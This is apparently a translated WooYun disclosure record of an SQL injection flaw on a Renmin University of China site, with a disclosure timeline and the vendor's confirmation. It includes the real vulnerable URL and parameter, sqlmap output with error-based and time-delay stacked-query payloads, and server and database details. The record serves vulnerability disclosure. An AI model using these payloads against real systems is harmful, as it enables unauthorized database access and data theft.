
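Vulnerability Summary

Bug ID: wooyun-2015-0156790

Title: SQL injection vulnerability on a Renmin University of China site

Vendor: Renmin University of China

Author: 路人甲

Submitted: 2015-11-30 11:46

Fixed: 2016-01-15 09:14

Publicly disclosed: 2016-01-15 09:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]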


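Vulnerability Details

Disclosure status:

2015-11-30: Details reported to the vendor; awaiting vendor handling
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and experts in related fields
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public

Brief description:

Detailed description:

http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111
17 databases are involved: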

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111' AND 5013=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5013=5013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'ckja'='ckja
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: eemd
[159 tables]

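Proof of vulnerability:

Fix:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-12-01 09:12

Vendor reply:

Confirmed; the relevant personnel have been notified to handle it.

Latest status:

None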

